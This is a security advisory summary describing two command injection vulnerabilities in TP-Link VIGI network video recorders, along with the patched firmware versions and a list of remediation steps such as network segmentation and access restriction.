Analysis Summary

Two high-severity vulnerabilities have been discovered in TP-Link’s VIGI network video recorder (NVR) systems, exposing critical surveillance infrastructure to the risk of remote command execution. The flaws, identified as CVE-2025-7723 and CVE-2025-7724, affect the VIGI NVR1104H-4P V1 and VIGI NVR2016H-16MP V2 models. These vulnerabilities allow attackers to inject and execute arbitrary operating system-level commands, potentially leading to full device compromise. The flaws are particularly dangerous due to the nature of NVRs in surveillance setups, as attackers could gain access to stored footage, disrupt operations, and pivot further into internal networks.

CVE-2025-7723 is an authenticated command injection vulnerability rated at high CVSS v4.0, which requires an attacker to log in before exploitation. Once authenticated, malicious actors can gain full control over the NVR by executing arbitrary OS commands. This could result in manipulation or deletion of surveillance data, unauthorized configuration changes, or the use of the compromised NVR as a launching point for broader network attacks. Although authentication is needed, the impact of a successful exploit remains severe due to the level of access gained.

In contrast, CVE-2025-7724 is an unauthenticated command injection vulnerability rated slightly higher at 8.7 CVSS v4.0, as it does not require any credentials to exploit. This makes it especially dangerous, since an attacker with only adjacent network access can exploit the flaw without any special privileges or user interaction. Exploitation could result in a complete breach of device confidentiality, integrity, and availability. It also opens the door for mass exploitation in exposed or poorly segmented networks, allowing threat actors to launch wider attacks with minimal effort.

To mitigate these threats, TP-Link has released patched firmware versions 1.1.5 Build 250518 for VIGI NVR1104H-4P V1 and 1.3.1 Build 250407 for VIGI NVR2016H-16MP V2 and urges all users to update immediately. Post-update, administrators are advised to verify that all security configurations remain intact and implement network segmentation to isolate critical infrastructure. Firmware should only be downloaded from TP-Link’s official support portal to ensure integrity and reduce the risk of supply chain compromise. Failure to patch could leave systems highly vulnerable to remote exploitation and surveillance breaches.

Impact

• Gain Access
• Data Manipulation

Indicators of Compromise

CVE

• CVE-2025-7723

• CVE-2025-7724

Affected Vendors

Remediation

• Refer to the TP-Link Security Advisory for patch, upgrade, or suggested workaround information.
• Download firmware updates only from TP-Link’s official support website to ensure authenticity and integrity.
• After updating, verify and reconfigure security settings to ensure no configurations were reset or disabled during the upgrade.
• Segment NVR devices on the network to isolate them from broader infrastructure and reduce the potential impact of compromise.
• Limit access to the management interface using firewall rules or VLANs, and restrict access to only trusted IP ranges.
• Regularly monitor device logs and behavior for any suspicious activity or unauthorized command execution attempts.
• Disable unused services and ports on the NVRs to minimize the attack surface.
• Ensure strong, unique administrator credentials are used and implement two-factor authentication if supported.